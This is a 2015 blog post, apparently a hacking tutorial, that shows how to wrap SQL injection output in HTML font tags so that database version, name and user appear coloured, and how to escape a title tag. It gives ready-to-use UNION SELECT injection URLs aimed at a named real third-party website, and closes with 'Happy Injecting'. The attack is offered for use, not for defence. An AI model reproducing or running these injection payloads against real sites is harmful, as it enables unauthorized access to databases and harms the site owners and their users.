Social Icons

Saturday 11 July 2015

Adding HTML Tags in SQL Queries

Adding HTML Tags in SQL Queries
Adding HTML Tags in SQL Queries - Tutorial by RAi Jee
HTML Tags can be used For a lot of Fun in SQL Queries . We Can use HTML Tags to Make Color full Result in Output.Sometimes we are injecting A site and The Vulnerable Columns is in Title or in Source Page so we Can also Use HTML Tags There to Show Output on The Page.
So We Will Start Adding HTML Tags For making Output Some Color Full.
Here is a example. We wanna Print The version in RED Color So Here is our HTML TAG for Showing the Version in RED Color . 
 <font color=red>

 Concat(OUR_HTML_TAG,QUERY_HERE)

 lets See the  Result.Before Executing The Query First Encode HTML TAG in Hex Value or Use Single Quote Before and After The HTML Tag To Make it Executable

 http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+
Adding HTML Tags in SQL Queries
And You can See the Version is in RED color. if we Wanna use Diffirent Colors for Each Command Like Displaying Version in RED Color ,Database in Green Color,User in Blue Color so will use Different HTML Tags for each Tasks.
See Example .
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML Tags For Each Task:
Red color: <font color=red>
Green Color: <font color=green>
Blue Color: <font color=blue>
So Our Final Query For Displaying Each task in Different color Will be,
Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())
See Example.
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+
Adding HTML Tags in SQL Queries
And See the picture all Tasks Are complete .In this way You Can Also Display Tables and Columns in different Colors.
After Displaying SQLi Commands in Different Colors .
Now Let's See how Can We Display Data When our Vulnerable Column is in Source Page or in TiTLE  Using HTML TAGS.
When Vulnerable Column is in Source Page.
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)
so we will use this HTML TAG for Displaying Data on the Page if Our Vulnerable Columns is in Source page.

 HTML TAG:Concat(<font size="8" color="red">,Version(),</font>) 

 and sometimes our Vulnerable Column is in Title so in that case we will use this HTML Tag to Print Data on the Webpage

 HTML TAG:Concat(</title>,Version())

 use these HTML Tags after encoding in Hex Value or PUT Single Quote before and after the HTML Tag to make the Query Executable.
Happy Injecting !!
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
Posted by at 08:27
Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)